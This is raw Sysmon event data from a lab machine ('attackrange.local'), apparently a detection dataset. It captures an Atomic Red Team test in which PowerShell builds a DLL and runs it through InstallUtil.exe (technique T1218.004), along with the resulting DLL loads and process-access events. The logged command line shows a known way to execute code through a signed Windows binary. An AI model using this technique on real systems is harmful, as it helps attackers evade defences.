14:22:44.831{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057455634Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.831{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057455633Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.831{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057455632Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.831{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057455631Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.831{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057455630Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.831{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=F9E249B6BB80C06BA30A61854567796C,SHA256=E5F62CD5D2FE7BE8D4E029ECA004A8773FF8D1F7AB92C115810AD54B5B8F50CAtrueMicrosoft WindowsValid 734700x800000000000000057455629Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.831{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll4.8.4180.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Execution EngineMicrosoft® .NET FrameworkMicrosoft Corporationmscoreei.dllMD5=899A8B655E52A061B33571D97C5C06ED,SHA256=DE05B03E37FB9BA5D74CF8FA36A6F0B15AB61705285B738BC90D14FDE580A45EtrueMicrosoft CorporationValid 734700x800000000000000057455628Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.831{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057455627Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.831{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057455626Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.831{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057455625Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.831{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 734700x800000000000000057455605Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.816{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe4.8.3761.0 built by: NET48REL1.NET Framework installation utilityMicrosoft® .NET FrameworkMicrosoft CorporationInstallUtil.exeMD5=4F296B709C187304D4609C11FD2BDC03,SHA256=756E583FF1E00A5DB0A2BEE3849693920C4BDFBE87D8757834093372CD690C71trueMicrosoft CorporationValid 10341000x800000000000000057455600Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.831{8B6011A9-C6FA-616E-9C35-01000000F101}41365516C:\Windows\system32\conhost.exe{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057455599Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.831{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057455598Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.816{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057455597Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.816{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\mscoree.dll10.0.14393.0 (rs1_release.160715-1616)Microsoft .NET Runtime Execution EngineMicrosoft® Windows® Operating SystemMicrosoft Corporationmscoree.dllMD5=5ECE402D7E12EC3750D044BF3D878DF6,SHA256=3F02B1AE7B61BC36B04EA2B82ED79F112219F4E9668518030FF14B005E2C9BBCtrueMicrosoft WindowsValid 10341000x800000000000000057455595Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.816{8B6011A9-78B4-618E-1BF7-04000000F101}98446040C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c01f5|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4572a0a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4572871(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45fb9a2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+456aaf7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+503b379(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+453009f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4593b11(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45759b1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45666d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45a2d74(wow64) 734700x800000000000000057455594Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.816{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 10341000x800000000000000057455593Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.816{8B6011A9-78B4-618E-1BF7-04000000F101}98446040C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c3566|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4572a0a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4572871(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45fb9a2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+456aaf7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+503b379(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+453009f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4593b11(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45759b1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45666d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45a2d74(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45a29fc(wow64) 10341000x800000000000000057455592Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.816{8B6011A9-888A-6164-7000-00000000F101}34483736C:\Windows\system32\csrss.exe{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057455591Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.816{8B6011A9-78B4-618E-1BF7-04000000F101}98446040C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4572a0a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4572871(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45fb9a2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+456aaf7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+503b379(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+453009f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4593b11(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45759b1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45666d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45a2d74(wow64) 154100x800000000000000057455590Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:44.824{8B6011A9-78B4-618E-20F7-04000000F101}6444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe4.8.3761.0 built by: NET48REL1.NET Framework installation utilityMicrosoft® .NET FrameworkMicrosoft CorporationInstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe" /logfile= /logtoconsole=false C:\Users\ADMINI~1\AppData\Local\Temp\2\T1218.004.dll C:\Users\Administrator\AppData\Local\Temp\2\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=4F296B709C187304D4609C11FD2BDC03,SHA256=756E583FF1E00A5DB0A2BEE3849693920C4BDFBE87D8757834093372CD690C71{8B6011A9-78B4-618E-1BF7-04000000F101}9844C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly . C:\AtomicRedTeam\atomics\T1218.004\src\InstallUtilTestHarness.ps1 $InstallerAssemblyDir = \""$Env:TEMP\\"" $InstallerAssemblyFileName = \""T1218.004.dll\"" $InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName $CommandLine = \""/logfile= /logtoconsole=false `\""$InstallerAssemblyFullPath`\""\"" $ExpectedOutput = 'Constructor_' $TestArgs = @{ OutputAssemblyDirectory = $InstallerAssemblyDir OutputAssemblyFileName = $InstallerAssemblyFileName InvocationMethod = 'Executable' CommandLine = $CommandLine } $ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs -MinimumViableAssembly if ($ActualOutput -ne $ExpectedOutput) { throw @\"" InstallUtil class constructor execution test failure. Installer assembly execution output did not match the expected output. Expected: $ExpectedOutput Actual: $ActualOutput \""@ }} 734700x800000000000000057456320Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:46.988{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057456319Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:46.988{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\474c5d5d840d0a8b1974061ff11f02c2\mscorlib.ni.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft Common Language Runtime Class LibraryMicrosoft® .NET FrameworkMicrosoft Corporationmscorlib.dllMD5=9955B914F307F0142D003E93A3A500BE,SHA256=1247284354586C375597AD8046AAC7F983BAAC74B545B674FB12DB4BAC5C6C01trueMicrosoft CorporationValid 734700x800000000000000057456318Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:46.988{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=1AF6CD8B7CE4A852F67AA98C71AA1D26,SHA256=EF0DE008500A8C9C7908383AF11AE55845EBBE28C96C013EA720950BA89D3D28trueMicrosoft WindowsValid 734700x800000000000000057456317Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:46.988{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ucrtbase_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationucrtbase_clr0400.dllMD5=F8F171BE1820544E15B555847005355C,SHA256=CDDF9A2BF085AE59BA464B3BA6394AACFC342DA5F17D77FD5306054C8AABF153trueMicrosoft CorporationValid 734700x800000000000000057456316Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:46.988{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\vcruntime140_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140_clr0400.dllMD5=63936588122BDEE9624D02CE3F8F54EA,SHA256=21F7E6165CE8DD92DB8CDF48CEE83DE64B2B0807B7B499CF87678B70C6F8C32FtrueMicrosoft CorporationValid 13241300x800000000000000057456315Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 14:22:46.988{8B6011A9-884A-6164-0100-00000000F101}4SystemHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT\Module\Microsoft.NET/Framework64/v4.0.30319/clr.dll\\Device\HarddiskVolume1\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeQWORD (0x01d7d7d0-0xc3dc40e0) 734700x800000000000000057456313Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 14:22:46.988{8B6011A9-78B6-618E-26F7-04000000F101}9344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Common Language Runtime - WorkStationMicrosoft® .NET FrameworkMicrosoft Corporationclr.dllMD5=1AF77AF533C702978D4C91C31DB1CCE5,SHA256=39AB2B2B034E3210D866FCF8649EB84C28E3DAB7CB7FA7C986346C6A9ED22D0AtrueMicrosoft CorporationValid 734700x800000000000000057456312Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 